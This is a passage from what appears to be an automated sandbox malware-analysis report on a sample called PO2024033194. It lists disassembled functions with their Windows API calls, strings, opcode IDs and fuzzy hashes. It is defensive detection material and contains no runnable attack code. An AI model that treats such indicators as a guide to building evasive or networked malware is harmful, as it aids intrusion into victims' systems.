                                                                  • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                  Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memcmp
                                                                  • String ID: &
                                                                  • API String ID: 2931989736-1010288
                                                                  • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                  • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                  • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                  • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                  Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: \
                                                                  • API String ID: 4104443479-2967466578
                                                                  • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                  • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                  • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                  • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                  Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 00466825
                                                                  • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CrackInternet_wcslen
                                                                  • String ID: |
                                                                  • API String ID: 596671847-2343686810
                                                                  • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                  • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                  • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                  • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                  Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: '
                                                                  • API String ID: 3850602802-1997036262
                                                                  • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                  • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                  • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                  • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                  Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _strlen.LIBCMT ref: 0040F858
                                                                    • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                    • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                  • _sprintf.LIBCMT ref: 0040F9AE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$_sprintf_strlen
                                                                  • String ID: %02X
                                                                  • API String ID: 1921645428-436463671
                                                                  • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                  • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                  • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                  • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                  Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: Combobox
                                                                  • API String ID: 3850602802-2096851135
                                                                  • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                  • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                  • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                  • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                  Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: LengthMessageSendTextWindow
                                                                  • String ID: edit
                                                                  • API String ID: 2978978980-2167791130
                                                                  • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                  • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                  • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                  • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                  Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemorySleepStatus
                                                                  • String ID: @
                                                                  • API String ID: 2783356886-2766056989
                                                                  • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                  • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                  • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                  • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                  Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: htonsinet_addr
                                                                  • String ID: 255.255.255.255
                                                                  • API String ID: 3832099526-2422070025
                                                                  • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                  • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                  • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                  • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                  Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: InternetOpen
                                                                  • String ID: <local>
                                                                  • API String ID: 2038078732-4266983199
                                                                  • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                  • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                  • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                  • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                  Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __fread_nolock_memmove
                                                                  • String ID: EA06
                                                                  • API String ID: 1988441806-3962188686
                                                                  • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                  • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                  • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                  • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                  Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: u,D
                                                                  • API String ID: 4104443479-3858472334
                                                                  • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                  • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                  • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                  • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                  Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • wsprintfW.USER32 ref: 0045612A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend_mallocwsprintf
                                                                  • String ID: %d/%02d/%02d
                                                                  • API String ID: 1262938277-328681919
                                                                  • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                  • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                  • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                  • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                  Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetCloseHandle.WININET(?), ref: 00442663
                                                                  • InternetCloseHandle.WININET ref: 00442668
                                                                    • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleInternet$ObjectSingleWait
                                                                  • String ID: aeB
                                                                  • API String ID: 857135153-906807131
                                                                  • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                  • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                  • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                  • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                  Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                  • PostMessageW.USER32(00000000), ref: 00441C05
                                                                    • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                  • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                  • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                  • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                  Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
